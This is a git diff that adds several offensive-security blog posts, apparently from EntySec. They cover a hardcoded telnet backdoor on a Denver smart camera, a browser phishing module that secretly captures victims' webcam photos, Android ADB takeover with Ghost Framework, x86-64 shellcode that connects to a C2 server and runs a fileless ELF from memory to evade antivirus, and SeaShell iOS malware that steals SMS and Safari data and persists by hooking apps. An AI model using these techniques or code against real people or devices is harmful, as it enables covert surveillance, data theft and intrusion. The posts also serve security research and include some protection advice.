+
+Backdoor was found in a Denver SHC-150 Smart Wifi Camera by Ivan Nikolsky, security researcher from EntySec.
+
+> I bought this model of wifi camera in the shop and before setting it up, checked it for vulnerabilities and backdoors.
+> I scanned this camera for open ports and noticed that telnet service is running on port 23. I brute-forced credentials and logged right to the shell.
+> There is no way to close this port or change credentials - they are hardcoded. Maybe other models also have this backdoor too, I am not sure.
+>
+> -- Ivan Nikolskiy
+
+So, the telnet service, as Ivan noticed, has hardcoded credentials and after brute-forcing them he found out that the only thing which is needed to login is username - `default`.
+
+```shell
+enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
+Trying 192.168.2.118...
+Connected to pc192-168-2-118.
+Escape character is '^]'.
+
+goke login: default
+$ ls /
+bin home linuxrc opt run tmp
+dev init media proc sbin usr
+etc lib mnt root sys var
+$ pwd
+/home/default
+$ exit
+Connection closed by foreign host.
+enty8080@Ivans-Air ~ %
+```
+
+As you can see, successfull login leads to the shell of the camera. Also he found out that Denver SHC-150 Smart Wifi Camera runs on `armle` CPU and has `r/w` filesystem.
+
+> So, backdoor is a factory telnet credential - `default`.
+> Just open the telnet connection with the camera on port 23 and enter `default`.
+> After this, you'll get a Linux shell.
+> Backdoor allows an attacker to execute commands on OS lever through telnet.
+>
+> -- Ivan Nikolskiy
+
+Ivan has already posted this research [here](https://www.exploit-db.com/exploits/50160).
diff --git a/_posts/2022-03-13-webcam-photo-phishing.md b/_posts/2022-03-13-webcam-photo-phishing.md
new file mode 100644
index 0000000..388a031
--- /dev/null
+++ b/_posts/2022-03-13-webcam-photo-phishing.md
@@ -0,0 +1,97 @@
+---
+title: Webcam Photo Phishing
+categories: [Exploitation]
+tags: [hatsploit, phishing]
+---
+
+Phishing is a common technique used by attackers to gain access to sensitive information through methods like social engineering. Attackers often attempt to obtain credentials, password hashes, location data, and other critical information by tricking users into revealing this data.
+
+In the HatSploit Framework, EntySec has implemented several modules specifically designed to target a victim’s webcam. These modules allow attackers to take a photo using the target's webcam through a browser and save the captured image as loot on the attacker's machine. Additionally, attackers can stream the webcam footage in real-time. These modules are named `exploit/generic/gather/browser_webcam_photo` and `exploit/generic/gather/browser_webcam_stream`.
+
+Here’s how you can access and use these modules:
+
+```entysec
+[hsf3]> search webcam
+
+Modules:
+
+ Number Category Module Rank Name
+ 0 exploit exploit/generic/gather/browser_webcam_photo low Gather Browser Webcam Photo
+ 1 exploit exploit/generic/gather/browser_webcam_stream low Gather Browser Webcam Stream
+```
+
+## Using the module
+
+Once you have identified the desired module, you can use it within the HatSploit Framework and set the appropriate options.
+
+For example, to use the `Gather Browser Webcam Photo` module:
+
+```entysec
+[hsf]> use 0
+[hsf3: Gather Browser Webcam Photo]> info
+
+ Name: Gather Browser Webcam Photo
+ Module: exploit/generic/gather/browser_webcam_photo
+Platform: generic
+ Rank: low
+
+Authors:
+ Ivan Nikolskiy (enty8080) - module developer
+
+Description:
+ This module generates a webpage that, when accessed by a victim, attempts to capture an image using the built-in webcam and send it to the attacker.
+
+References:
+ URL: https://blog.entysec.com/2022-03-13-webcam-photo-phishing/
+
+Stability:
+ This module is stable and does not crash the target.
+```
+
+## Configuring the module
+
+You will need to configure several options before running the module:
+
+```entysec
+[hsf3: Gather Browser Webcam Photo]> options
+
+Module Options (exploit/generic/gather/browser_webcam_photo):
+
+ Option Value Required Description
+ HOST yes HTTP host.
+ MESSAGE Grant Access yes Message to display.
+ PATH /Users/felix/.hsf/loot/zIlWzaKkC9x28XX7.png yes Path to save file.
+ PORT 80 yes HTTP port.
+ SSL no no Use SSL.
+ TIMEOUT 10 no Connection timeout.
+ URLPATH / yes File path on server.
+```
+
+## Running the module
+
+After configuring the options, you can start the web server and wait for the victim to access the malicious webpage. The module will continue to capture images from the victim’s webcam until it is manually interrupted.
+
+Here’s an example:
+
+```entysec
+[hsf3: Gather Browser Webcam Photo]> set host localhost
+[i] host => localhost
+[hsf3: Gather Browser Webcam Photo]> set port 8080
+[i] port => 8080
+[hsf3: Gather Browser Webcam Photo]> run
+
+[*] Starting HTTP listener on port 8080...
+[*] Delivering payload...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[*] Taking webcam photo...
+[!] Exploit module interrupted.
+```
+
+This module will continue to capture and update the photo file saved in the loot directory until you stop it manually with keyboard interrupt (Ctrl-C).
+
+By utilizing this module, attackers can gain access to sensitive webcam data through the use of phishing techniques, making it an essential tool in the HatSploit Framework.
diff --git a/_posts/2022-08-08-ghost-framework.md b/_posts/2022-08-08-ghost-framework.md
new file mode 100644
index 0000000..c0542da
--- /dev/null
+++ b/_posts/2022-08-08-ghost-framework.md
@@ -0,0 +1,126 @@
+---
+title: Android Audit with Ghost
+categories: [Post-Exploitation]
+tags: [android]
+image:
+ path: https://user-images.githubusercontent.com/54115104/116760735-6da1e780-aa1e-11eb-8c6f-530386487671.png
+---
+
+The EntySec Ghost Framework offers a powerful suite of commands and functions specifically tailored for Android penetration testing, making it a valuable tool for security professionals and ethical hackers focused on Android device security. Here’s a detailed look at some of its core commands and functions, and how they can be applied in security assessments:
+
+## Key Commands and Functions
+
+* Connection Management Commands
+ * **connect** - Connects to a target Android device's IP address via the Android Debug Bridge (ADB) if the ADB service is enabled on the device.
+ * **disconnect** - Disconnects from the connected device, allowing testers to terminate the connection quickly.
+ * **devices** - Lists all devices currently connected to Ghost Framework, displaying information such as IP addresses and connection statuses.
+
+```entysec
+(ghost)> connect 192.168.2.101
+[*] Connecting to 192.168.1.101...
+[+] Connected to 192.168.1.101!
+
+[i] Type devices to list all connected devices.
+[i] Type interact 0 to interact this device.
+(ghost)> devices
+
+Connected Devices:
+
+ ID Host Port
+ 0 192.168.1.101 5555
+```
+
+These commands form the core of the framework, enabling testers to establish and terminate connections to Android devices.
+
+* Device Information Retrieval Commands
+ * **battery** - Shows the battery status of the connected device, which can be useful in determining device activity.
+ * **network** - Displays network-related information, such as IP addresses, MAC addresses, and network type (Wi-Fi, cellular, etc.), giving insights into the device's connectivity.
+
+```entysec
+(ghost)> interact 0
+[*] Interacting with device 0...
+[+] Interactive connection spawned!
+
+[*] Loading device modules...
+[i] Modules loaded: 13
+(ghost: 192.168.1.101)> help
+
+Core Commands:
+
+ Command Description
+ clear Clear terminal window.
+ exit Exit console.
+ help Show all available commands.
+ quit Exit console.
+ source Execute specific file as source.
+
+
+Manage Commands:
+
+ Command Description
+ download Download file from device.
+ keyboard Interact with device keyboard.
+ list List directory contents.
+ network Retrieve network informations.
+ openurl Open URL on device.
+ press Press device button by keycode.
+ screenshot Take device screenshot.
+ shell Execute shell command on device.
+ sleep Put device into sleep mode.
+ upload Upload file to device.
+
+Press Enter for more, 'a' for all, 'q' to quit:
+```
+
+These commands help testers understand the target device's setup and network environment, providing a foundational overview before further testing.
+
+* File System Access and Management Commands
+ * **list** - Lists files and directories in the specified path on the Android device.
+ * **cd** - Changes the current working directory on the target device, allowing testers to navigate through the file system.
+ * **download** - Pulls files from the target Android device to the local system.
+ * **upload** - Uploads files from the local system to the target Android device.
+
+```entysec
+(ghost: 192.168.1.101)> list /
+
+Directory /:
+
+ Name Mode Size Modification Time
+ . 16877 4096 1970-01-01 01:00:19
+ .. 16877 4096 1970-01-01 01:00:19
+ Reserve0 16877 16384 1970-01-01 01:00:00
+ acct 16749 0 1970-01-01 01:00:06
+ bin 41380 11 2008-12-31 16:00:00
+ bugreports 41380 50 2008-12-31 16:00:00
+ cache 16888 4096 2008-12-31 16:03:01
+ charger 41380 13 2008-12-31 16:00:00
+ config 16877 0 1970-01-01 01:00:01
+ d 41380 17 2008-12-31 16:00:00
+ data 16889 4096 2008-12-31 16:03:03
+ default.prop 41344 23 2008-12-31 16:00:00
+ dev 16877 1560 1970-01-01 01:00:11
+ etc 41380 11 2008-12-31 16:00:00
+ file_contexts.bin 33188 763704 2008-12-31 16:00:00
+ init 33256 1711440 2008-12-31 16:00:00
+ init.environ.rc 33256 1139 2008-12-31 16:00:00
+ init.rc 33256 29580 2008-12-31 16:00:00
+ init.recovery.sun50iw6p1.rc 33256 328 2008-12-31 16:00:00
+ init.usb.configfs.rc 33256 7690 2008-12-31 16:00:00
+ init.usb.rc 33256 5646 2008-12-31 16:00:00
+Press Enter for more, 'a' for all, 'q' to quit:
+```
+
+These commands are essential for file exploration, providing access to data stored on the device, which can be critical when assessing sensitive information exposure.
+
+## Practical Applications in Security Testing
+
+* Network Security Testing: Ghost Framework can test the security of the ADB protocol, especially if the device is inadvertently exposed to public networks.
+* Application Security Assessment: By listing installed applications and their versions, testers can identify outdated or potentially vulnerable apps, which could be exploited.
+* Forensic Analysis: Ghost Framework’s remote access capabilities enable real-time forensic analysis of an Android device’s file system and active applications, which can be
+ useful for incident response.
+
+## Ethical and Legal Implications
+It’s essential to remember that while Ghost Framework is a powerful tool, it is meant strictly for authorized testing. Unauthorized access to Android devices is illegal and unethical. Always obtain explicit consent before performing any penetration testing, and ensure compliance with relevant laws and regulations.
+
+## Final Notes
+Ghost Framework offers deep, hands-on interaction with Android devices, providing security professionals a robust toolkit for analyzing Android security. The framework’s capabilities underscore the importance of securing Android devices, especially by disabling the ADB service on devices that don’t require it and by applying security patches regularly to close known vulnerabilities.
diff --git a/_posts/2023-04-02-remote-elf-loading.md b/_posts/2023-04-02-remote-elf-loading.md
new file mode 100644
index 0000000..25e75ea
--- /dev/null
+++ b/_posts/2023-04-02-remote-elf-loading.md
@@ -0,0 +1,134 @@
+---
+title: Remote in-memory ELF loader
+categories: [Programming]
+tags: [assembly, malware]
+---
+
+Fileless malware distribution is gaining popularity.
+What is not surprisingly, because the work of such programs leaves almost no traces.
+Moreover, since the very beginning hackers always searched for ways to stay anonymous and hide their malware on the system.
+Thats why we focused on deep diving into this subject and came with the idea.
+In Windows, there is **Reflective DLL Injection** which allows to execute malware right into the memory of the compromised process, but on Linux there is no such existing implementation.
+So, then we thought, why not to use different ways of executing ELF files?
+
+We found out that there is a technique of creating temporary filesystem using `/dev/shm`, but this actually does not provide us what we want.
+Out goal is to execute ELF file right into the memory, not from the disk.
+And then, after reading this [very interesting article](https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html) we decided to improve method described in it.
+As we all know it is possible to create different file descriptor and write data to it.
+This file descriptor will appear in `/proc/` and then can be executed as a file.
+
+Fortunately, `procfs` does not exist on disk and kernel creates it in the memory which is a good thing for us:
+
+```
+The /proc filesystem contains a illusionary filesystem.
+It does not exist on a disk. Instead, the kernel creates it in memory.
+```
+
+*3.7. The /proc filesystem*
+
+So, the concept of the whole process is:
+
+**1.** Read ELF data from socket
+**2.** Map it into the memory
+**3.** Write to the created file descriptor
+**4.** Execute it from `/proc/self/fd/`
+
+## Shellcode
+
+Let's begin writing our shellcode.
+
+First step is to set up socket for further communication:
+
+```nasm
+.equ SYS_SOCKET 0x29
+.equ AF_INET 0x2
+.equ SOCK_STREAM 0x1
+
+_sys_socket:
+ push SYS_SOCKET
+ pop rax
+ cdq
+ push AF_INET
+ pop rdi
+ push SOCK_STREAM
+ pop rsi
+ syscall
+```
+
+Now, we are ready to connect to our C2 server:
+
+```nasm
+_sys_connect:
+ xchg rdi, rax
+ movabs rcx, C2_ADDR
+ push rcx
+ mov rsi, rsp
+ push 0x10
+ pop rdx
+ push 0x2a
+ pop rax
+ syscall
+```
+
+Lets imagine that we now read ELF file length and have it in the `r12` register.
+Moreover, we have already allocated memory using `mmap` and have address pointing to it in `r15`.
+Then, we have already read ELF data to the allocated memory and the next step is to create file descriptor.
+For this purpose we are gonna use `memfd_create` system call:
+
+```nasm
+.equ SYS_MEMFD 0x13f
+.equ FILE_SIZE 0x8
+
+_sys_memfd:
+ xor rax, rax
+ push rax
+ push rsp
+ sub rsp, FILE_SIZE
+ mov rdi, rsp
+ push SYS_MEMFD
+ pop rax
+ xor rsi, rsi
+ syscall
+```
+
+Then we save our file descriptor to `r14` via `push rax; pop r14` and then we need to write our ELF data from the allocated memory right to the file descriptor.
+After all these steps done, we need to concatenate `/proc/self/fd/` and our file descriptor. There are different ways to do this, but in our case we'll use stack:
+
+```nasm
+add rsp, 16
+mov qword ptr [rsp], 0x6f72702f
+mov qword ptr [rsp+4], 0x65732f63
+mov qword ptr [rsp+8], 0x662f666c
+mov qword ptr [rsp+12], 0x002f64
+```
+
+Then we need to convert our file descriptor to the string and append it to the stack above. We'll pass this step.
+
+Now, we are ready to execute our file descriptor using `execve`:
+
+```nasm
+.equ SYS_EXECVE 0x3b
+
+_sys_execve:
+ lea rdi, [rsp]
+ push SYS_EXECVE
+ pop rax
+ cdq
+ push rdx
+ push rdi
+ mov rsi, rsp
+ syscall
+```
+
+First instruction puts path `/proc/self/fd/` to the first argument of `execve`.
+
+As the result, we'll get our ELF file executed. And we didn't even touch the disk!
+
+## Conclusion
+
+Fileless loading of ELF files in Linux is a useful technique when doing
+penetration testing. This is a fairly quiet way to
+resist a wide range of anti-virus protection, control systems
+integrity and monitoring systems that monitor content changes
+hard drive. In this way, access to the target can be easily maintained.
+system, leaving a minimum of traces.
diff --git a/_posts/2023-12-31-seashell-ios-malware.md b/_posts/2023-12-31-seashell-ios-malware.md
new file mode 100644
index 0000000..b31846e
--- /dev/null
+++ b/_posts/2023-12-31-seashell-ios-malware.md
@@ -0,0 +1,140 @@
+---
+title: SeaShell - iOS 16/17 Remote Access
+categories: [Post-Exploitation]
+tags: [seashell, jailbreak, ios, malware]
+pin: true
+image:
+ path: https://raw.githubusercontent.com/EntySec/SeaShell/main/seashell/data/logo.png
+---
+
+## Introduction
+
+iPhones have a reputation for robust security, largely thanks to the extensive hardware security features they incorporate. As one of the world's most widely-used and secure mobile operating systems, iOS consistently attracts the attention of hackers. A notable example of this is the sophisticated ['Operation Triangulation'](https://securelist.com/operation-triangulation-the-last-hardware-mystery/111669/) attack discovered by Kaspersky. With each new version, Apple intensifies the security protocols within iOS, making it increasingly challenging for attackers to discover vulnerabilities. Consequently, the nature of these attacks is evolving, becoming more intricate and advanced in response to the heightened security measures.
+
+Despite the robust security measures in iOS, a recent vulnerability was identified in a kernel extension known as CoreTrust. CoreTrust's role parallels that of [AppleMobileFileIntegrity (AMFI)](https://theapplewiki.com/wiki/AppleMobileFileIntegrity), which is to verify the signatures of executable files. Essentially, when an attempt is made to run an unsigned binary executable, the dynamic linker (dyld) typically returns an error, specifically error 85, indicating a `85 EBADEXEC Bad executable (or shared library)`.
+
+This vulnerability in CoreTrust, designated as [CVE-2022-26766](https://nvd.nist.gov/vuln/detail/cve-2022-26766), impacted several iOS versions. It was first addressed in iOS 15.5, but the issue resurfaced in the betas of iOS 15.6 before being rectified again in the final release. This bug allowed the bypassing of CoreTrust's security checks, enabling unauthorized software execution. iOS versions prior to 12 did not have CoreTrust and hence were not affected by this bug. The regression of this bug did not impact iOS 12 and 13. However, versions 15.0 to 15.4.1 were susceptible to the original CoreTrust bug, leading to its exploitation in applications such as [TrollStore](https://trollstore.app/). Later versions, including iOS 15.5 to 16.6.1 and iOS 17.0, also encountered an AMFI/CoreTrust issue, where the system failed to adequately verify the legitimacy of a root certificate used to sign a binary. These incidents underline the complexity and evolving challenges in maintaining iOS security.
+
+The [SeaShell Framework](https://github.com/entysec/seashell), created by EntySec, serves as a demonstrative model for a potential attack method that hackers could employ to install malicious software on devices. This method circumvents security protocols by exploiting the CoreTrust vulnerability. To raise awareness about the viability of such attacks in the current digital landscape, EntySec has released all the relevant code associated with this attack process. This information is particularly valuable to the public and security experts. It is important to note that applications like the previously mentioned [TrollStore](https://trollstore.app/) could act as an initial step in such an attack. Further details on this aspect will be provided subsequently.
+
+
+
+
+
+## SeaShell Framework
+
+SeaShell Framework is an iOS post-exploitation framework that enables you to access the device remotely, control it and extract sensitive information. All attacker needs to do is generate IPA file and start TCP listener. The IPA needs to be installed trough TrollStore or other application that exploits CoreTrust bug and launched single time. After this, if listener and connect-back host were configured correctly, attacker will receive an interactive session with the device. Moreover, SeaShell utilizes a sophisticated payload called [Pwny](https://github.com/EntySec/Pwny). It has lots of features including evasion, TLS encryption, dynamic extensions and much more. There are all the features that SeaShell provides:
+
+* **IPA generator** - All you need to do is generate an IPA file and install it on a target's device via [TrollStore](https://trollstore.app/) or other IPA installer that bypasses CoreTrust. After app was installed, a target simply need to run an app single time (he may close application completely after this).
+* **Powerful Implant** - SeaShell Framework uses the advanced and powerful payload with lots of features. It is called [Pwny](https://github.com/EntySec/Pwny). You can extend it by adding your own post-exploitation modules or plugins.
+* **Basic Set** - SeaShell Framework comes with basic set of post-exploitation modules that may exfiltrate following user data: SMS, VoiceMail, Safari history and much more.
+* **Encrypted communication** - Communication between device and SeaShell is encrypted using the [TLS 1.3](https://en.wikipedia.org/wiki/Transport_Layer_Security) encryption by default.
+* **Regular updates** - SeaShell Framework is being actively updated, so don't hesitate and leave your [feature request](https://github.com/EntySec/SeaShell/issues/new?assignees=&labels=&projects=&template=feature_request.md&title=)!
+
+It can be installed for publicly available repository using pip and then the interface might be launched with `seashell` command:
+
+```shell
+pip3 install git+https://github.com/EntySec/SeaShell
+```
+
+It then may be updated with this command:
+
+```shell
+pip3 install --force-reinstall git+https://github.com/EntySec/SeaShell
+```
+
+## How IPA works
+
+So, basically IPA is a compressed application bundle for iOS application that contains main executable, icons, `Info.plist` and other files related to the program. SeaShell utilizes its own application bundle with a simple executable and other executable which launches the Pwny payload. These are the stages of attack:
+
+
+
+
+
+## Usage
+
+### Generating IPA
+
+Simply generate custom IPA file or patch existing one and install it on target's iPhone or iPad via [TrollStore](https://trollstore.app/) or other IPA installer that bypasses CoreTrust.
+
+
+
+
+
+### Starting listener
+
+Then you will need to start a listener on a host and port you added to your IPA. Once the installed application opens, you will receive a connection.
+
+
+
+
+
+### Accessing device
+
+Once you have received the connection, you will be able to communicate with the session through a [Pwny](https://github.com/EntySec/Pwny) interactive shell. Use `devices -i ` to interact and `help` to view list of all available commands. You can even extract Safari history like in the example below.
+
+
+
+
+
+## Interactive shell
+
+The interactive shell offered by Pwny simplifies the process of interacting with a compromised device. It features a robust interface equipped with essential tools for various tasks, such as managing the file system, extracting confidential data, uploading files, running programs, and many more capabilities. Below, I have outlined some of the prominent features that are presently available in this interface.
+
+### Safari data
+
+At present, it's possible to extract sensitive data from Safari using a few commands. To access the web browsing history, the command `safari_history` can be used. This command retrieves the database located at `/var/mobile/Library/Safari/` and parses it for information. Similarly, the command `safari_bookmarks` operates in the same manner, allowing you to view saved bookmarks by downloading and parsing the relevant Safari data.
+
+
+
+
+
+### SMS data
+
+The interface also grants access to SMS data. You can list the chats present in the SMS application using the command `sms -l`. To extract the chat history with a specific contact, the command `sms ` can be used. Additionally, the contacts command allows for the retrieval of the contact list from the address book.
+
+
+
+
+
+### Hooking to other applications
+
+Interface provides its own persistence method. Since on non-jailbroken phones (and rootless) `launchctl` is useless, interface uses "hooking". This means that payload is being injected inside a desired application's bundle and next time application is launched, attacker gets new remote connection. The hook can be installed via `hook` command and removed via `unhook`. Below I install hook to Calculator.app:
+
+
+
+
+
+### Media player
+
+A fun feature that I would like to introduce is `player` command. It enables you to control media player. It has few options that are listed below.
+
+* `player info` - Get current playing item information.
+* `player pause` - Stop current playing item.
+* `player play` - Resume current playing item.
+* `player next` - Go to next playing item.
+* `player back` - Go back to the previous playing item.
+* `player wave ` - Play local audio file on device. (known supported formats are `wav` and `mp3`)
+
+
+
+
+
+## How to protect?
+
+In response to numerous online requests, I've prepared a guide on how to reduce the likelihood of falling victim to an attack via the SeaShell framework. Below are my suggestions:
+
+* **1.** Unzip IPA file that you want to install.
+* **2.** Check of suspicious executables in the application bundle (e.g. SeaShell Framework adds executable called `mussel` to its application bundle which is a representation of [Pwny](https://github.com/EntySec/Pwny) payload).
+* **3.** Read `Info.plist` and search for suspicious entries (e.g. SeaShell adds `CFBundleBase64Hash` to its `Info.plist`, it contains a host pair `:` encoded with base64)
+* **4.** Check MD5 hash sum of the file to check its integrity.
+
+## Conclusion
+
+The SeaShell Framework serves as a stark reminder that iOS security flaws can be exploited for purposes beyond just sideloading applications or jailbreaking, as seen with TrollStore. These vulnerabilities can also be used to install harmful software onto devices. This highlights the importance of vigilance when handling IPA packets. Before installing any IPA packet on your system, it's crucial to thoroughly analyze it for potential security risks. This extra step of caution can help prevent the inadvertent installation of malicious software, safeguarding your device from unwanted breaches and ensuring the integrity of your system's security.
diff --git a/_posts/2024-01-03-ios-evasion-nowadays.md b/_posts/2024-01-03-ios-evasion-nowadays.md
new file mode 100644
index 0000000..44ecb72
--- /dev/null
+++ b/_posts/2024-01-03-ios-evasion-nowadays.md
@@ -0,0 +1,37 @@
+---
+title: iOS Evasion Nowadays
+categories: [Post-Exploitation]
+tags: [seashell, jailbreak, ios, malware]
+pin: true
+---
+
+Since the development of [SeaShell](https://github.com/entysec/seashell) iOS post-exploitation framework started, I was thinking about evasion techniques that can be applicable to a non-jailbroken (or jailbroken but rootless) iOS systems. So, after few days of brainstorming I came with few ideas that can be used and that I have already implemented in SeaShell.
+
+
+
+
+
+## Persistence
+
+Typically, we use `launchctl` to achieve persistence on iOS/macOS. However, on non-jailbroken iOS devices (and even on jailbroken ones nowadays, as they are rootless), the root directory (`/`) is not writable, which means that we cannot write to `/Library/LaunchAgents` or `/Library/LaunchDaemons`. Consequently, we are unable to install a `.plist` file that would launch the payload.
+
+Recognizing the need for a persistence installation method, I came up with an idea: What if we inject the payload into existing user applications? Initially, I considered inserting a dynamic library (`.dylib`) into the bundle executable of an application, but this would require re-signing the binary. Then, I had another idea: we can replace the bundle executable with a custom binary that will first execute the payload and then call the original executable.
+
+Essentially, our custom executable will use the `posix_spawn()` function to execute the payload and then use `execve()` to invoke the original executable. Since `execve()` replaces the current process image with a new one, this is the optimal approach to launch the application. Below, you can find a diagram illustrating this process using the `Calculator.app` as an example.
+
+
+
+
+
+To perform hooking we need:
+
+* **1.** Patch `Info.plist` and add `CFBundleBase64Hash` containing base64 representation of `:` to connect back to.
+* **2.** Move `Calculator` to `Calculator.hooked`. (`CFBundleExecutable` for other applications)
+* **3.** Upload custom executable that will perform the loading and call it `Calculator` (`CFBundleExecutable` for other applications).
+* **4.** Upload `mussel` payload that will call Pwny and perform connection.
+* **5.** Perform `chmod` operations on both custom executable and `mussel`, otherwise `posix_spawn()` will die with `error 13` which is `Permission denied`.
+
+I am concerned that persistence can be called an evasion technique due to the fact that we are injecting our payload into another application infecting it.
diff --git a/_tabs/about.md b/_tabs/about.md
index ddb2bc4..a81775e 100644
--- a/_tabs/about.md
+++ b/_tabs/about.md
@@ -4,5 +4,4 @@ icon: fas fa-info-circle
order: 4
---
-> Add Markdown syntax content to file `_tabs/about.md`{: .filepath } and it will show up on this page.
-{: .prompt-tip }
+EntySec is a group of security professionals and software engineers involved in the development of security tools and services.
diff --git a/assets/img/logo-blue.png b/assets/img/logo-blue.png
new file mode 100644
index 0000000..4155dce
Binary files /dev/null and b/assets/img/logo-blue.png differ
diff --git a/assets/img/shc-150-specs.png b/assets/img/shc-150-specs.png
new file mode 100644
index 0000000..604229f
Binary files /dev/null and b/assets/img/shc-150-specs.png differ
diff --git a/assets/main.css b/assets/main.css
new file mode 100644
index 0000000..0d8e970
--- /dev/null
+++ b/assets/main.css
@@ -0,0 +1,27 @@
+.language-mermaid .label {
+ text-transform: inherit;
+}
+
+.language-entysec .zp {
+ text-decoration: underline;
+}
+
+.language-entysec .ze {
+ color: #960050;
+}
+
+.language-entysec .zg {
+ color: #859900;
+}
+
+.language-entysec .zs {
+ color: #268bd2;
+}
+
+.language-entysec .zi {
+ font-weight: bold;
+}
+
+.language-entysec .zw {
+ color: orange;
+}
\ No newline at end of file
+
+
+
+
+
+
+
+